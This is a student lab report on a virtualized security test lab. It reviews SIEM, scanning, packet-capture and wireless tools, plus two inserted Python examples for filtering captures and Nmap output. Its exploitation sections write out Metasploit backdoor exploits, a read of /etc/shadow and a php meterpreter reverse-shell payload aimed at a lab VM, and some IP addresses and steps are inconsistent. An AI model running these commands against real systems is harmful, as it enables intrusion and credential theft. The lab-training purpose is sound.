
Running head: FINAL COMPREHENSIVE OVERVIEW OF THE VIRTUALIZED

Final comprehensive overview of the virtualized security platform

Raul Mendoza

University of San Diego

Network Visualization and Vulnerability Detection

CSOL 570

Mike Hallman

March 12, 2017



Final comprehensive overview of the virtualized security platform

Trade Study Review

Trade-study on open source network visualization tools:

In this study, I reviewed and evaluated two open source network visualization / Security Information and Event Management (SIEM) tools (AlienVault OSSIM, SIEMonster) against five criteria, using information gathered from publicly available sources.

The exchange of information and the visualization these tools provide expand an analyst's ability to quickly identify attacks and incidents without having to correlate the information manually. Many of these tools interact with other SIEM systems in order to present a complete picture. Based on the evaluation criteria I established for this study, I created essential areas of focus to ensure the analyst was provided with visual and correlation tools. Although cost was not included, it could, if considered, shift the selection of a SIEM tool considerably.

When reviewing and grading the capabilities provided in each tool, the importance of an analyst's ability to receive correlated information, have it displayed clearly, and maintain real-time situational awareness of their environment became clear. SIEMonster provided greater depth of monitoring capabilities, data correlation, documentation, and reporting mechanisms, which made it the distinct winner.

Wireshark Capture:

The purpose of this trade-study was to install Wireshark and perform a capture of selected traffic. In order to perform the capture correctly, we had to identify the interface the traffic would be transmitted through. Once selected, the traffic began to flow through Wireshark and I was able to review specific protocols by applying specific types of filtering. The filtering applied allowed me to review the IP packets captured, the TCP segments captured on port 80 (tcp.port == 80), and the encrypted messages captured as TLSv1.2.

Wireshark gives administrators the ability to monitor traffic within a specific network. As an open source tool, it has opened the door for many security experts to analyze packets without having to spend a large sum of money. It enables network administrators to troubleshoot network problems, security engineers to identify security problems, and developers to debug protocol implementations, and it provides users an effective way to learn about protocols. Wireshark is extremely powerful and should be included in any security expert's tool bag.
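To make concrete what the three display filters above actually match on, the following is an added example (not part of the original paper, and not Wireshark's own code) that decodes raw Ethernet/IPv4/TCP frames just far enough to evaluate "ip", "tcp.port == 80" and a TLS 1.2 check. The frames are constructed inline with the lab addresses from the paper; MAC addresses and checksums are zeroed, and the TLS check is a simplification that looks only at the record-layer version.

```python
import struct

# Constants used by the three filters from the write-up ("ip", "tcp.port == 80", TLSv1.2).
ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
PROTO_TCP = 6
TLS_RECORD_TYPES = {0x14, 0x15, 0x16, 0x17}   # change_cipher_spec, alert, handshake, application_data
TLS12_VERSION = 0x0303


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Build a minimal Ethernet II / IPv4 / TCP frame. Constructed test input: MAC addresses
    are zeroed and checksums are left at 0, which Wireshark would flag but this parser ignores."""
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack(
        "!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64, PROTO_TCP, 0,
        bytes(int(o) for o in src_ip.split(".")), bytes(int(o) for o in dst_ip.split(".")),
    )
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Decode just enough of a raw frame to evaluate the filters: is it IP, is it TCP,
    which ports, and does the TCP payload start with a TLS 1.2 record header."""
    info = {"ip": False, "tcp": False, "sport": None, "dport": None, "tls12": False}
    if len(frame) < 14 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return info                      # e.g. ARP: excluded by the "ip" filter
    ihl = (frame[14] & 0x0F) * 4         # IPv4 header length in bytes
    if len(frame) < 14 + ihl or frame[14] >> 4 != 4:
        return info
    info["ip"] = True
    if frame[14 + 9] != PROTO_TCP:       # IPv4 protocol field
        return info
    tcp_off = 14 + ihl
    if len(frame) < tcp_off + 20:
        return info
    sport, dport = struct.unpack("!HH", frame[tcp_off:tcp_off + 4])
    data_off = (frame[tcp_off + 12] >> 4) * 4
    info.update(tcp=True, sport=sport, dport=dport)
    payload = frame[tcp_off + data_off:]
    # TLS record header = content type (1 byte), version (2 bytes), length (2 bytes).
    # Simplification: real ClientHellos often carry 0x0301 in the record layer for compatibility
    # and Wireshark also inspects the handshake version; here only the record version is checked.
    if len(payload) >= 5 and payload[0] in TLS_RECORD_TYPES:
        info["tls12"] = struct.unpack("!H", payload[1:3])[0] == TLS12_VERSION
    return info


FILTERS = {
    "ip": lambda p: p["ip"],
    "tcp.port == 80": lambda p: p["tcp"] and 80 in (p["sport"], p["dport"]),
    "tls12": lambda p: p["tls12"],
}


def apply_filter(frames, name):
    """Return the indices of the frames that match the named filter."""
    return [i for i, f in enumerate(frames) if FILTERS[name](parse_frame(f))]


# Constructed sample capture using the lab addresses from the write-up.
SAMPLE_FRAMES = [
    build_frame("192.168.56.102", "192.168.56.101", 40001, 80, b"GET / HTTP/1.1\r\n\r\n"),
    build_frame("192.168.56.101", "192.168.56.102", 80, 40001, b"HTTP/1.1 200 OK\r\n\r\n"),
    build_frame("192.168.56.102", "192.168.56.101", 40002, 443,
                b"\x16\x03\x03\x00\x04" + b"\x01\x00\x00\x00"),  # TLS 1.2 handshake record
    b"\x00" * 12 + struct.pack("!H", ETHERTYPE_ARP) + b"\x00" * 28,  # ARP frame: not IP
]

if __name__ == "__main__":
    for name in FILTERS:
        print(f"{name:16} -> frames {apply_filter(SAMPLE_FRAMES, name)}")
```

Running the block lists which sample frames each filter keeps: the ARP frame drops out of "ip", only the two HTTP segments survive "tcp.port == 80", and only the frame carrying a TLS 1.2 record header survives the TLS check.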

Vulnerability scanning trade-study:

In this trade-study we were expected to review two vulnerability tools (Nessus and Nmap) to determine the optimal vulnerability tool based on the five evaluation criteria I created. Vulnerability tools give security experts the ability to map out and scan for weaknesses, as well as offering solutions to close the holes found.

The evaluation criteria aided in narrowing the focus of the trade study and ensured each tool was reviewed fairly. Here are the criteria used:

1. What is the level of expertise/complexity required to operate the tool?
2. Is the tool compatible with the CVE program?
3. How frequently is the tool updated?
4. What level of support/documentation is provided?
5. What is the cost of the tool?

When reviewing and grading the capabilities provided in each tool, it was easy to determine which provided the most capabilities based on the criteria. Although Nessus appeared to score well across the criteria, it is important to acknowledge that its cost is what funds the level of support, functionality, and integration the others lack, because they are not funded similarly. Nmap does provide a robust number of options, and if cost is the most important factor, it should meet or exceed expectations. But when all factors in addition to cost are considered, Nessus was the clear choice.

Metasploitable image and exploits:

There are many ways we can use tools to determine the landscape of existing vulnerabilities within an environment. Within a system or network there are methods to identify the type of operating system and hardware that exist. In this trade study we were expected to determine the landscape of the environment/target VM and perform exploits based on discovered vulnerabilities.

During the enumeration phase of this study I ran numerous Nmap scans against the Metasploitable image:

Scan: nmap -p0-65535 192.168.56.101
Scan: nmap -sT 192.168.56.101 - Scan using TCP connect
Scan: nmap -sS 192.168.56.101 - Scan using TCP SYN scan
Scan: nmap -sU -p 123,161,162 192.168.1.1 - Scan UDP ports
Scan: nmap -A 192.168.56.101 - Detect OS and Services
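Enumeration scans like these produce a lot of output, and the useful defensive step is to turn them into an inventory of listening services and compare it with what a host is supposed to expose (the same kind of policy-deviation check the paper later attributes to Nessus). The following is an added example, not part of the original paper and not Nmap's own code: it parses Nmap's grepable (-oG) output format, in which each port entry is written as port/state/protocol/owner/service/rpc_info/version/ with any "/" inside a field replaced by "|". The scan output and the allowed-port policy are constructed samples using the paper's lab host and services.

```python
import re
from dataclasses import dataclass

# One "Ports:" entry in nmap -oG output: port/state/protocol/owner/service/rpc_info/version/
# nmap replaces any '/' inside a field with '|' so the field separators stay unambiguous.
PORT_ENTRY_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


@dataclass
class OpenPort:
    host: str
    port: int
    proto: str
    service: str
    version: str


def parse_grepable(text):
    """Parse nmap grepable (-oG) output and return the open ports per host."""
    found = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                      # comments and 'Status: Up' lines carry no ports
        host = line.split()[1]
        # Fields on a Host line are tab separated; keep only the Ports: field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_ENTRY_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            if state == "open":
                found.append(OpenPort(host, int(port), proto, service, version.strip()))
    return found


def policy_deviations(open_ports, policy):
    """Return open ports that are not in the host's allowed (port, proto) set: the same kind
    of check the write-up describes Nessus performing against a pre-defined port policy."""
    return [p for p in open_ports if (p.port, p.proto) not in policy.get(p.host, set())]


# Constructed sample of `nmap -A -oG -` output for the Metasploitable host in the write-up.
SAMPLE_OUTPUT = """\
# Nmap scan initiated (constructed sample) as: nmap -A -oG - 192.168.56.101
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 23/open/tcp//telnet//Linux telnetd/, 25/filtered/tcp//smtp///, 80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV|2)/, 6667/open/tcp//irc//UnrealIRCd/\tIgnored State: closed (995)
# Nmap done (constructed sample) -- 1 IP address (1 host up) scanned
"""

# Hypothetical baseline: only the web server is expected to be reachable on this host.
POLICY = {"192.168.56.101": {(80, "tcp")}}


def report(text, policy):
    """Human-readable summary: every open port, with a flag on those outside the policy."""
    ports = parse_grepable(text)
    flagged = {(p.host, p.port, p.proto) for p in policy_deviations(ports, policy)}
    lines = []
    for p in ports:
        mark = "DEVIATION" if (p.host, p.port, p.proto) in flagged else "allowed"
        lines.append(f"{p.host} {p.port}/{p.proto} {p.service} ({p.version}) [{mark}]")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_OUTPUT, POLICY)))
```

On the sample, the filtered SMTP port is dropped because only open ports are inventoried, and FTP, Telnet and IRC are flagged because the baseline permits only 80/tcp; in practice the policy would come from the host's documented build rather than a literal in the script.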

Once the enumeration was complete, I determined which exploit(s) to use to gain access to the system. Upon review of the target system we were able to determine the operating system and services currently running. Below are the different exploits used to gain access:

FTP allows anonymous log in and is vulnerable to the vsftpd backdoor exploit. I successfully achieved root access and was able to retrieve the shadow file entry for root.

• use exploit/unix/ftp/vsftpd_234_backdoor
• exploit
• whoami
• hostname
• grep root /etc/shadow

HTTP port 80 is open and is hosting an Apache 2.2.8 web server.

Telnet sends text in the clear and allows anyone monitoring traffic to see usernames and passwords as they are passed across the network.

Metasploitable2 runs the UnrealIRCd IRC daemon, and I was able to gain access.

• use exploit/unix/irc/unreal_ircd_3281_backdoor
• set RHOST 192.168.56.101
• exploit

When determining how best to exploit a system, it is important to know the landscape and the potential vulnerabilities associated with the target environment. Once enumeration was complete, I determined which exploits to use. Throughout this study, I was able to effectively enumerate the target system and successfully run different exploits to achieve access as root. Though I was successful in achieving access, not every service was vulnerable. Although not every service was exploitable, an attacker only needs one to achieve the same results.

Kismet review and operation:

For this trade study we were asked to install Guest Additions and an external USB adapter within our Kali environment. Guest Additions are designed to be installed inside a virtual machine after the guest operating system has been installed. They consist of device drivers and system applications that optimize the guest operating system for better performance and usability. Because the VM does not see the built-in wireless adapter, an external USB adapter was necessary to achieve optimal results for wireless collection.

In order to run Kismet effectively, we needed to start the server first. When configuring the server, an interface must be added (wlan0) to capture the appropriate wireless traffic. Once the server was started, the client was launched. Upon successful configuration, the wireless adapter began identifying SSIDs and clients. In addition, we were asked to log the necessary information. When creating the different log files, I specified the type of data I wanted Kismet to log with the following configuration line:

• logtypes=dump,network,csv,xml,weak,cisco,gps

Here we have told Kismet to create log files for:

• Kismet-Mar-05-2008-1.cisco
• Kismet-Mar-05-2008-1.csv
• Kismet-Mar-05-2008-1.dump
• Kismet-Mar-05-2008-1.network
• Kismet-Mar-05-2008-1.weak
• Kismet-Mar-05-2008-1.xml

When configuring and running Kismet I was able to detect, identify, capture, and log wireless traffic, access points, and clients. It is powerful because of its ability to collect information passively, without transmitting any packets of its own. In addition, because of its ability to channel hop, I was also able to see a large number of SSIDs regardless of adjacent channel overlap. Kismet is a useful tool that gives us visibility into what wireless activity is occurring and lets us determine whether clients are connected to a network. Because I created separate logs, I was able to view the following information:

• Layer 2 protocols for Cisco devices
• Raw packet dump for Wireshark
• Network information
• Packets with weak initialization vectors for WEP

Virtualized test lab architecture

Kali VM

The Kali environment provides us a suite of tools to perform a number of actions that allow for collection, enumeration, and exploitation of hosts and networks. For the purpose of this course we were asked to load and use Kali to gain knowledge of the tools and environment. My environment has the following configuration:

O/S: Debian 64 bit
Memory Size: 2048 MB
Hard Drive: 8 GB
DHCP IP address: 192.168.56.102
IP Range: 192.168.56.101-254
Network: 570 test lab

Metasploitable VM

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. In this study we were asked to install and launch the VM and use Kali to perform numerous operations against it. Below is the environment built for these actions:

O/S: Ubuntu 64 bit
Memory Size: 1024 MB
Hard Drive: 8 GB
DHCP IP address: 192.168.56.110
IP Range: 192.168.56.101-254
Network: 570 test lab

OSSIM

OSSIM, AlienVault's Open Source Security Information and Event Management (SIEM) product, provided an open source SIEM complete with event collection, normalization, and correlation. Its configuration required more resources because of the level of processing performed:

O/S: Linux 64 bit
Memory Size: 2048 MB
Processors: 2
Hard Drive: 16 GB
DHCP IP address: 192.168.56.115
IP Range: 192.168.56.101-254
Network: 570 test lab

Kali VM with Guest Additions

The Kali VM was the standard load, but Guest Additions were installed to increase user operability and device management. The configuration was the same, with the exception of the USB adapter:

O/S: Debian 64 bit
Memory Size: 2048 MB
Hard Drive: 8 GB
DHCP wlan0 IP address: 192.168.56.103 (when working)
IP Range: 192.168.56.101-254
Network: 570 test lab

Security Toolkit

Tool Type: Security Event Information Management tool
Tool Name: AlienVault OSSIM
Tool Description: AlienVault OSSIM is an open source SIEM that provided correlation of various events across multiple levels throughout my environment. In addition, it provided asset discovery, vulnerability assessment, intrusion detection, and behavioral monitoring.

Tool Type: Security Event Information Management tool
Tool Name: SIEMonster
Tool Description: SIEMonster is an open source SIEM that provided web services monitoring, firewall capabilities, domain monitoring, OSINT, HIDS, IPS, and AV. In addition, it correlated all the information and presented it to me visually with ease.

Tool Type: Network scanning tool
Tool Name: Nessus
Tool Description: Enterprise scanning tool that performs enumeration and detection of available services running within a host or network.

Tool Type: Network scanning tool
Tool Name: Nmap
Tool Description: Open source scanning tool within Kali that allows for enumeration and detection of available services running within a host or network.

Tool Type: Packet capture tool
Tool Name: Wireshark
Tool Description: An open source packet capture tool that provided me the ability to perform traffic analysis, with integrated sorting and filtering options, within my virtual environment.

Tool Type: Wireless packet capture tool
Tool Name: Kismet
Tool Description: Wireless packet capturing tool designed to detect, identify, capture, and log wireless traffic, access points, and clients. In addition, it provided me the ability to log various data points for the different SSIDs.

Tool Type: Exploitation tool
Tool Name: Metasploit
Tool Description: A framework and collection of programs and tools for penetration testing networks. Metasploit has a collection of exploits, payloads, libraries, and interfaces that can be used to exploit computers.


Surveillance and Reconnaissance Processes

1. Scan a network to determine the operating systems installed on hosts
   a. Nmap:
      i. Scan: nmap -A 192.168.56.101 - Detect OS and Services
   b. Nessus:
      i. GUI based; using a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the name of the remote operating system in use.

2. Perform a dictionary attack against a host's SSH service
   a. Metasploit
      i. # rlogin -l root 192.168.56.110

3. Launch an exploit payload against a vulnerable web service
   a. Metasploit
      i. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 R > payload.php
      ii. use multi/handler
      iii. set PAYLOAD php/meterpreter/reverse_tcp
      iv. set LHOST 192.168.56.102
      v. set LPORT 4444
      vi. exploit -z -j

4. Identify the ports listening on a host
   a. Nmap:
      i. Scan: nmap -p0-65535 192.168.56.101
      ii. Scan: nmap -sT 192.168.56.101 - Scan using TCP connect
      iii. Scan: nmap -sS 192.168.56.101 - Scan using TCP SYN scan
      iv. Scan: nmap -sU -p 123,161,162 192.168.1.1 - Scan UDP ports
   b. Nessus:
      i. GUI/plugin based; uses two different types of scans, basic and advanced, to run the netstat port scanner for a list of open ports and then flags any open ports that deviate from the pre-defined policy.

5. Eavesdrop on communications between two hosts
   a. Wireshark:
      i. Scroll to "09 Sniffing and Spoofing"
      ii. Select Wireshark
      iii. Wireshark will start, at which point you will need to select an interface to begin packet capture.
      iv. Select eth0
      v. Once started, Wireshark will begin collecting traffic specific to eth0
      vi. If we want to see specific traffic, we can apply different filters that will show only what we want to see. In this instance, I applied a TCP filter showing only web traffic captured on port 80 (tcp.port == 80)

6. Identify the SSID of an active wireless network
   a. Kismet:
      i. Upon starting the Kismet server the interface was added
      ii. wlan0 began searching for traffic
      iii. Select the Network list
      iv. Another window will display all the detected SSIDs broadcasting
